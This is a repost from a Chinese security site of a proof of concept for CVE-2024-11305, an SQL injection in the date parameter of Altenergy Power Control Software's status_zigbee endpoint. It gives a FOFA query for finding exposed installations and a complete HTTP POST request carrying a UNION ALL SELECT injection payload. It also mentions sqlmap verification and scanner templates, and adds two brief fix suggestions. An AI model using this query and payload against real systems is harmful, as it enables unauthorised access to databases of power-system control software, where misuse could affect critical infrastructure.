Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Poc

admin 2024年11月28日21:54:53评论12 views字数 1121阅读3分44秒阅读模式

00
产品简介
 

Altenergy电力系统控制软件是Altenergy Power System推出的一款专业软件。旨在为用户提供全面、高效、安全的电力系统控制解决方案。广泛应用于各类电力系统领域,如电力调度中心、发电厂、变电站、工业园区等。通过该软件的应用,用户可以实现对电力系统的全面监控和管理,提高电力系统的稳定性和安全性,降低运维成本。

 

01
漏洞概述
 

Altenergy 电力系统控制软件中发现了一个被归类为严重漏洞。此漏洞影响文件 /index.php/display/status_zigbee 的 get_status_zigbee函数。使用未知输入操纵参数 date 会导致 sql 注入漏洞。

 

02
搜索引擎
 
FOFA:
title="Altenergy Power Control Software"
Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Poc

 

03
漏洞复现
POST /index.php/display/status_zigbee HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: close
date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)||CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,113),11-- wPIB
Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Poc
sqlmap验证
Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Poc

04
检测工具
 

nuclei

Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Poc

afrog

Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Poc

xray

Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Poc

 

05
修复建议
 

1、关闭互联网暴露面或接口设置访问权限

2、建议使用此软件的用户参考网址获取解决方案:https://apsystems.com/

原文始发于微信公众号(nday POC):Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月28日21:54:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Altenergy电力系统控制软件 status_zigbee SQL注入漏洞(CVE-2024-11305) Pochttps://cn-sec.com/archives/3447233.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息